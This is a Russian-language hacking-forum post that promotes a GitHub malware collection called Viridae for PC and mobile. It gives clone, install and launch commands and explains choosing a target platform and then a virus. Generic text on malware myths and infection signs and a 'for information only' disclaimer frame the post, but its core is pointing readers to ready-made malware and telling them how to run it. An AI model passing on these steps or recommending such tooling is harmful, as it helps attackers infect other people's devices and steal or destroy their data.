Перейти к содержимому



Фотография
  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1 roguevad

roguevad

    Эксперт.

  • Пользователи
  • PipPipPipPipPip
  • 442 сообщений

Отправлено 10 Апрель 2022 - 11:20

Приветствую, хакеры! Термин «вредоносное ПО» используется для описания любой вредоносной программы на компьютере или мобильном устройстве. Эти программы устанавливаются без согласия пользователей и могут вызывать ряд неприятных последствий, таких как снижение производительности компьютера, извлечение из системы персональных данных пользователя, удаление данных или даже воздействие на работу аппаратных средств компьютера.

Поскольку киберпреступники придумывают все более сложные способы проникновения в системы пользователей, рынок вредоносных программ существенно расширился.

 

Сборник малварей для ПК и телефона

Установка:

   git clone https://github.com/E...ICA/Viridae.git

   cd Viridae

   pip2 install -r requirements.txt

 

Использование:

   python2 Viridae – запуск утилиты

Далее выбираем платформу (Android/MacOS/Windows и тд.) и уже сам вирус.

 

Мифы и факты

Существует ряд распространенных мифов, связанных с компьютерными вирусами:

  • Любое сообщение об ошибке компьютера указывает на заражение вирусом. Это неверно: сообщения об ошибках также могут быть вызваны ошибками аппаратного или программного обеспечения.
  • Вирусам и червям всегда требуется взаимодействие с пользователем. Это не так. Для того чтобы вирус заразил компьютер, должен быть исполнен код, но это не требует участия пользователя. Например, сетевой червь может заражать компьютеры пользователей автоматически, если на них имеются определенные уязвимости.
  • Вложения к электронным письмам от известных отправителей являются безопасными. Это не так, потому что эти вложения могут быть заражены вирусом и использоваться для распространения заражения. Даже если вы знаете отправителя, не открывайте ничего, что в чем вы не уверены.
  • Антивирусные программы могут предотвратить заражение. Со своей стороны, поставщики антивирусного ПО делают все возможное, чтобы не отставать от разработчиков вредоносных программ, но пользователям обязательно следует установить на своем компьютере комплексное защитное решение класса Internet security, который включает в себя технологии, специально предназначенные для активного блокирования угроз. Даже при том, что 100-процентной защиты не существует. Нужно просто осознанно подходить к обеспечению собственной онлайн-безопасности, чтобы уменьшить риск подвергнуться атаке.
  • Вирусы могут нанести физический ущерб вашему компьютеру. Что если вредоносный код приведет к перегреву компьютера или уничтожит критически важные микрочипы? Поставщики защитных решений неоднократно развенчивали этот миф – такие повреждения просто невозможны.

Признаки заражения

Хотя большинство вредоносных программ не оставляет никаких явных следов, и ваш компьютер работает нормально, иногда все же можно заметить признаки возможного заражения. Самый первый из них – снижение производительности, т.е. процессы происходят медленные, загрузка окон занимает больше времени, в фоновом режиме работают какие-то случайные программы. 

Еще одним настораживающим признаком может считаться измененных домашних интернет-страниц в вашем браузере или более частое, чем обычно, появление всплывающих объявлений. В некоторых случаях вредоносное ПО даже может влиять на базовые функции компьютера: не открывается Windows, нет подключения к Интернету или доступа к более высокоуровневым функциям управления системой более высокого уровня. 

Если вы подозреваете, что ваш компьютер может быть заражен, немедленно произведите проверку системы. Если заражение не обнаружено, но вы все еще сомневаетесь, получите второе мнение – запустите альтернативный антивирусный сканер.

Репозиторийhttps://github.com/Err0r-ICA/Viridae

Авторhttps://github.com/Err0r-ICA/

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 





Темы с аналогичным тегами взлом, взломщик, хакер, хакинг, взлом винды, как взломать системы, вирус, вредоносное по, сборник вирусов, фишинг, троян, вирусы для андроид, вирусы для пк, уязвимость, эксплойт


Яндекс.Метрика Top.Mail.Ru Analysis Счетчик ИКС
Добавить Vkontakte Добавить в Facebook Добавить в Twitter Добавить в LiveJournal